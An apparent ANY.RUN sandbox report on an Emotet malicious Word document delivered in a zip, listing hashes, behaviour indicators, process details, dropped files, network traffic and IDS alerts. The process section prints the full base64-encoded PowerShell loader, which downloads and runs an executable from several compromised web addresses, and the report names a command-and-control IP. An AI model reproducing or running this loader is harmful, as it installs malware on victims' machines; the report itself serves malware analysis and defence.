analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

69512_543.zip

Full analysis: https://app.any.run/tasks/537fe7f4-16a5-47d5-b0b8-33cc5a97da98
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 05:18:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract
MD5:

31600250D692BBC755DFB5E09B64CF90

SHA1:

FBC7BD44BFBCC14EFC356DC627C00417FCC75452

SHA256:

AC0486B1B00FBD3C6FD98BFFD5B6485D71263928ED94648B3206B4AB80CFFD93

SSDEEP:

768:gizl4jSiEo2z6d1x5LyIeCtSykHTlvzrrq5/EP8LXyLMw5c+Qg473dhBVTyuZ+3:gQ2HDkIItTtPnULUMw5DaLdhBVyuZs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • StructuredQuery.exe (PID: 2176)
      • Slk0lv.exe (PID: 3280)
    • Downloads executable files from the Internet

      • POwersheLL.exe (PID: 3720)
    • EMOTET was detected

      • StructuredQuery.exe (PID: 2176)
    • Connects to CnC server

      • StructuredQuery.exe (PID: 2176)
    • Changes the autorun value in the registry

      • StructuredQuery.exe (PID: 2176)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 1688)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 3720)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3720)
    • Executed via WMI

      • POwersheLL.exe (PID: 3720)
    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 3720)
      • Slk0lv.exe (PID: 3280)
    • Reads Internet Cache Settings

      • StructuredQuery.exe (PID: 2176)
    • Starts itself from another location

      • Slk0lv.exe (PID: 3280)
    • Connects to server without host name

      • StructuredQuery.exe (PID: 2176)
  • INFO

    • Manual execution by user

      • chrome.exe (PID: 3884)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3928)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3928)
    • Application launched itself

      • chrome.exe (PID: 3884)
    • Reads the hosts file

      • chrome.exe (PID: 3884)
      • chrome.exe (PID: 1828)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 69512_543.doc
ZipUncompressedSize: 103569
ZipCompressedSize: 39647
ZipCRC: 0x22b15148
ZipModifyDate: 2020:09:30 01:10:01
ZipCompression: Unknown (99)
ZipBitFlag: 0x0003
ZipRequiredVersion: 51
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
68
Monitored processes
25
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe no specs winword.exe no specs powershell.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs slk0lv.exe #EMOTET structuredquery.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1688"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\69512_543.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3928"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb1688.45811\69512_543.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3720POwersheLL -ENCOD JABQADcAdAAwADAAbQBzAD0AKAAoACcARgBkACcAKwAnADQAJwApACsAKAAnADQAJwArACcAbgA1AHMAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlACcAKwAnAG0AJwApACAAJABFAG4AVgA6AHUAcwBFAFIAcABSAG8ARgBpAGwARQBcAHAARABtADQANgB3AHcAXABSADIAWQBIAEEANQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAEUAYwB0AG8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBDAFUAUgBJAHQAYAB5AHAAYABSAE8AVABPAGMATwBMACIAIAA9ACAAKAAoACcAdAAnACsAJwBsAHMAMQAnACsAJwAyACwAIAAnACkAKwAnAHQAJwArACcAbAAnACsAKAAnAHMAMQAnACsAJwAxACwAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQAWQB0AGkAMABhAGcAZQAgAD0AIAAoACcAUwAnACsAJwBsACcAKwAoACcAawAwAGwAJwArACcAdgAnACkAKQA7ACQAWAAwADQAdgBlAHIAXwA9ACgAKAAnAEMAJwArACcAdgBsACcAKQArACcAbgAnACsAKAAnAGUAeAAnACsAJwBnACcAKQApADsAJABOAHYAMABqADcAZgBoAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAEkAJwArACgAJwBRAG0AUABkAG0AJwArACcANAA2AHcAJwArACcAdwBJACcAKQArACcAUQAnACsAKAAnAG0AJwArACcAUgAyAHkAaAAnACsAJwBhADUAOQBJAFEAJwArACcAbQAnACkAKQAgACAALQBSAGUAcABMAEEAYwBFACgAJwBJACcAKwAnAFEAbQAnACkALABbAGMAaABhAHIAXQA5ADIAKQArACQAWQB0AGkAMABhAGcAZQArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEcAdwBnAHYAMgA1ADUAPQAoACgAJwBWACcAKwAnAGoAdAB0AHoAJwApACsAJwB0AF8AJwApADsAJABPAF8AYwBiAHQAOAB3AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcAZQBCAGMAbABJAEUAbgBUADsAJABIAHAAMQAxAGwAdwA0AD0AKAAoACcAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwBsACcAKQArACgAJwBiAGwAYwBvAG0AcAB1AHQAYQAnACsAJwBjAGkAJwArACcAbwAnACsAJwBuAC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAHMAZQAnACkAKwAnAHIAdgAnACsAJwBpACcAKwAoACcAYwAnACsAJwBlAHMAJwApACsAKAAnAC8AJwArACcAZQBZACcAKwAnADMALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwADoAJwApACsAKAAnAC8ALwBzACcAKwAnAGgAbwAnACsAJwBwAC4AaAAnACkAKwAoACcAbwBtAGUAbgAnACsAJwBoAGUAJwApACsAJwBhACcAKwAnAGwAdAAnACsAKAAnAGgAeQAuAGMAbwAnACsAJwBtAC8AdwAnACsAJwBwACcAKQArACcALQAnACsAJwBpACcAKwAnAG4AJwArACgAJwBjAGwAdQBkAGUAJwArACcAcwAnACkAKwAoACcALwAnACsAJwBMAHQAagAnACkAKwAnAC8AKgAnACsAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAvACcAKQArACgAJwAvAHIAJwArACcAYQBpACcAKQArACgAJwBuAHQAbwBkAGEAJwArACcAeQAnACsAJwAuACcAKQArACgAJwBvAHIAJwArACcAZwAvAHcAcAAnACsAJwAtAGEAZABtACcAKQArACgAJwBpAG4AJwArACcALwBCACcAKwAnAC8AKgBoACcAKwAnAHQAdABwAHMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwBxAHUAYQBsAGkAJwArACcAdAB5AGMAJwArACcAaABpACcAKwAnAGwAZABjACcAKQArACgAJwBhACcAKwAnAHIAJwArACcAZQBwACcAKwAnAHIAJwArACcAZQBzAGMAaABvAG8AbAAuACcAKQArACgAJwBjAG8AbQAvACcAKwAnAGUAbQBxACcAKwAnAGIAJwArACcAbABrAC8AbQAnACsAJwAvACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAcwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuACcAKwAoACcAdAAnACsAJwBlAGsAJwArACcAYQBkAGIAJwApACsAKAAnAGEAJwArACcAdABhAG0AJwApACsAKAAnAC4AYwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwBwAC0AYwAnACsAJwBvAG4AJwArACcAdAAnACsAJwBlAG4AdAAvAFEAcQAvACoAJwArACcAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAoACcAcwA6AC8AJwArACcALwBiAG8AawBlAC4AeAAnACsAJwBpACcAKwAnAGEAbwB4AGkAZQBrAGUAagAnACsAJwBpAC4AdABvACcAKQArACcAcAAvACcAKwAnADkAYQAnACsAKAAnADYANQAnACsAJwA0ACcAKQArACgAJwB6ACcAKwAnAG8AcgAvAEoAbgBTAC8AKgBoAHQAdAAnACsAJwBwADoAJwApACsAJwAvACcAKwAoACcALwB5AHMALgB4ACcAKwAnAGkAJwApACsAKAAnAGEAJwArACcAbwB4AGkAZQBrACcAKwAnAGUAJwApACsAJwBqACcAKwAnAGkALgAnACsAJwB0ACcAKwAoACcAbwBwAC8AdwAnACsAJwBwAC0AYQBkACcAKwAnAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAHUAUQBZACcAKwAnAC8AJwApACkALgAiAHMAcABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQB0AHgAXwBnADIAbgA9ACgAJwBGACcAKwAnAHMAegAnACsAKAAnAGgAYwByACcAKwAnAG8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABJADUANgA3AGIAeABvACAAaQBuACAAJABIAHAAMQAxAGwAdwA0ACkAewB0AHIAeQB7ACQATwBfAGMAYgB0ADgAdwAuACIARABPAFcAYABOAGwAYABvAEEAZABmAEkATABFACIAKAAkAEkANQA2ADcAYgB4AG8ALAAgACQATgB2ADAAagA3AGYAaAApADsAJABOADEAYgBuAGYAXwB3AD0AKAAoACcARAAnACsAJwBfADMAJwApACsAJwA3ADkAJwArACcAcgA4ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABOAHYAMABqADcAZgBoACkALgAiAGwAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwAxADMAMgAwACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AJwArACcAawBlAC0ASQB0AGUAbQAnACkAKAAkAE4AdgAwAGoANwBmAGgAKQA7ACQAUwBtAHYAYQBnAG8AcwA9ACgAJwBNACcAKwAoACcAbgBpAGUAdwAnACsAJwAyACcAKQArACcAbgAnACkAOwBiAHIAZQBhAGsAOwAkAEEAXwBfAHMAeAByAGIAPQAoACcATwAnACsAKAAnADYAJwArACcAZwBfACcAKQArACgAJwByACcAKwAnADIAMgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAB3AG4AZgA0AHMAbgA9ACgAJwBPACcAKwAoACcAZAB5AHcAbgAnACsAJwAwAHQAJwApACkA C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3884"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
75.0.3770.100
1752"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6d07a9d0,0x6d07a9e0,0x6d07a9ecC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
75.0.3770.100
996"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2768 --on-initialized-event-handle=324 --parent-handle=328 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
75.0.3770.100
2416"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1000,12152149464899452927,14717231960527147609,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=12942052053964881236 --mojo-platform-channel-handle=1020 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
75.0.3770.100
1828"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1000,12152149464899452927,14717231960527147609,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --service-request-channel-token=5050404383131507877 --mojo-platform-channel-handle=1648 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exe
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
75.0.3770.100
3772"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1000,12152149464899452927,14717231960527147609,131072 --enable-features=PasswordImport --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=11489598230126683625 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2224 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
3456"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1000,12152149464899452927,14717231960527147609,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4715018312241750065 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Total events
4 108
Read events
3 044
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
53
Text files
76
Unknown types
3

Dropped files

PID
Process
Filename
Type
3928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR1614.tmp.cvr
MD5:
SHA256:
3720POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A70MTEYOAFDAUG6YXFHA.temp
MD5:
SHA256:
3928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFADB32C816ED229D8.TMP
MD5:
SHA256:
3928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF7F7DAC8CDE143BF9.TMP
MD5:
SHA256:
3928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF4C57BC0D3D53070A.TMP
MD5:
SHA256:
3928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D8C11A4F-1C21-4042-8087-E6D164FF16AC}.tmp
MD5:
SHA256:
3928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFA9FCCA760671796C.TMP
MD5:
SHA256:
3928WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3143E316-F27E-4505-AF26-7C4AF7CF7C02}.tmp
MD5:
SHA256:
1688WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb1688.6610\69512_543.doc
MD5:
SHA256:
3884chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F7415BA-F2C.pma
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
28
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3720
POwersheLL.exe
GET
66.97.41.90:80
http://lblcomputacion.com/services/eY3/
US
suspicious
2176
StructuredQuery.exe
POST
200
128.92.203.42:80
http://128.92.203.42/AmW3/RPfOlD/9yc3PXu/
US
binary
132 b
malicious
3720
POwersheLL.exe
GET
200
34.67.97.45:80
http://shop.homenhealthy.com/wp-includes/Ltj/
US
executable
149 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1828
chrome.exe
172.217.16.131:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
1828
chrome.exe
172.217.23.110:443
consent.google.com
Google Inc.
US
whitelisted
3720
POwersheLL.exe
66.97.41.90:80
lblcomputacion.com
Peer 1 Network (USA) Inc.
US
suspicious
1828
chrome.exe
172.217.23.131:443
fonts.gstatic.com
Google Inc.
US
whitelisted
1828
chrome.exe
216.58.208.42:443
fonts.googleapis.com
Google Inc.
US
whitelisted
1828
chrome.exe
142.250.74.206:443
clients2.google.com
Google Inc.
US
whitelisted
1828
chrome.exe
142.250.74.196:443
www.google.com
Google Inc.
US
whitelisted
3720
POwersheLL.exe
34.67.97.45:80
shop.homenhealthy.com
US
suspicious
1828
chrome.exe
216.58.205.237:443
accounts.google.com
Google Inc.
US
whitelisted
1828
chrome.exe
216.58.205.227:443
www.gstatic.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
lblcomputacion.com
  • 66.97.41.90
suspicious
clientservices.googleapis.com
  • 172.217.16.131
whitelisted
accounts.google.com
  • 216.58.205.237
shared
www.google.com
  • 142.250.74.196
whitelisted
fonts.gstatic.com
  • 172.217.23.131
whitelisted
fonts.googleapis.com
  • 216.58.208.42
whitelisted
shop.homenhealthy.com
  • 34.67.97.45
suspicious
clients2.google.com
  • 142.250.74.206
whitelisted
www.gstatic.com
  • 216.58.205.227
whitelisted
consent.google.com
  • 172.217.23.110
shared

Threats

PID
Process
Class
Message
3720
POwersheLL.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
3720
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3720
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3720
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3720
POwersheLL.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
2176
StructuredQuery.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 4
2176
StructuredQuery.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info